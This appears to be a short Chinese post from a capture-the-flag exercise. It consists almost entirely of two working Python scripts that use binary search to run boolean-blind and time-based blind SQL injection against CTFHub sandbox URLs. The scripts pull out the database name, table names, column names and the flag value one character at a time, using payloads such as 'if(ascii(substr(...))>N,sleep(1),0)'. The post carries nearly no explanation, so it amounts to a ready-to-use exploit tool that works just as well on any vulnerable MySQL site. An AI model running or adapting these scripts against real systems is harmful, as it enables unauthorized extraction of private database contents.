sql布尔盲注和时间盲注的二分脚本
布尔盲注:
import requests
url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"
def inject_database(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
params = {'id':payload}
r = requests.get(url,params = params)
if "query_success" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def inject_table(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
params = {'id':payload}
r = requests.get(url,params = params)
if "query_success" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def inject_column(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
params = {'id':payload}
r = requests.get(url,params = params)
if "query_success" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def flag(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
params = {'id':payload}
r = requests.get(url,params = params)
if "query_success" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
时间盲注:
import requests
import time
# time.time()
url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"
def inject_database(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
params = {'id':payload}
start_time = time.time() # 注入前的系统时间
r = requests.get(url,params = params)
end_time = time.time() # 注入后的时间
if end_time - start_time > 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def inject_table(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
params = {'id':payload}
start_time = time.time() # 注入前的系统时间
r = requests.get(url,params = params)
end_time = time.time() # 注入后的时间
if end_time - start_time > 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def inject_column(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
params = {'id':payload}
start_time = time.time() # 注入前的系统时间
r = requests.get(url,params = params)
end_time = time.time() # 注入后的时间
if end_time - start_time > 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
def flag(url):
name = ''
for i in range(1,100000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
params = {'id':payload}
start_time = time.time() # 注入前的系统时间
r = requests.get(url,params = params)
end_time = time.time() # 注入后的时间
if end_time - start_time > 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print (name)
# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)